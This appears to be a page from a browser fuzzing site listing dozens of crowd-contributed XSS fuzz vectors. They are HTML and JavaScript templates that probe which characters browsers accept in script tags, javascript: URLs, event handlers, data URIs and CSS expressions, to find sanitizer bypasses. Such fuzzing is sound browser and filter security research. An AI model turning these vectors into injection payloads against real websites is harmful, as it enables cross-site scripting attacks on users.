Featured vector

Default Browser 0.0
<!-- sample vector --> <img src onerror0x09=0x09alert(1)>

Fuzz vector cloud

Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string style svg tag tags test testing uri vbscript xml

3,403,239 Successful fuzzes

Fuzz Vectors

Searching for "Script"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
close tag construction unicode <script> logChr(*num*)<*uni*script> @_ttffdd_
close tag construction <script>logChr(*num*)<*raw1*script> @_ttffdd_
html elements that end scripts <script>//</*datahtmlelements*> logChr(*num*); </script> @Nomicon3
script param separator <script x=x*chr*src=data:,logChr(*num*)></script> @i_bo0om
Comma analog in script src data <script src=data:*chr*logChr(*num*)></script> @i_bo0om
Characters that eat JavaScript regex escapes <script> var regexChars = /*chr*\$/g if(!("*chr*$".match(regexChars))) { logChr(*num*) } </script> @tifkin_
Characters that modify JavaScript regex character classes <script> var regexChars = /[*chr*.]/g if(!(".".match(regexChars))) { logChr(*num*) } <script> @tifkin_
Characters ignored in Javascript function call with unicode 2 <script>l\*chr*u006fg(*num*)</script> @garethheyes
Characters ignored in Javascript function call with unicode <script>l\u006f*chr*g(*num*)</script> @garethheyes
Characters that end script tags <script*chr*test>logChr(*num*)</script> @JohnathanKuskos
Characters that separate JavaScript object key and value <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> @peksa
Characters that start JavaScript double quote strings <script> *chr*"; logChr(*num*) </script> @peksa
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
Characters that separate JavaScript assignment statements <script> var a={}*chr*b={}&logChr(*num*); </script> @Giutro
Characters that allow a new statement to begin2 <script> var a={}*chr*b=logChr(*num*); </script> @tifkin_
Characters that allow a new statement to begin <script> var a={}*chr*logChr(*num*); </script> @tifkin_
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
Characters that make a double quote valid <script> *chr*"; logChr(*num*); </script> @tifkin_
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed to hex encodings of javascript variables <script> lo\u*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed to hex encode javascript <script> lo\*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
SVG script <svg><script*chr*>logChr(*num*)</script></svg> @garethheyes
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed as vbscript variables <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> @garethheyes
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Uncode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes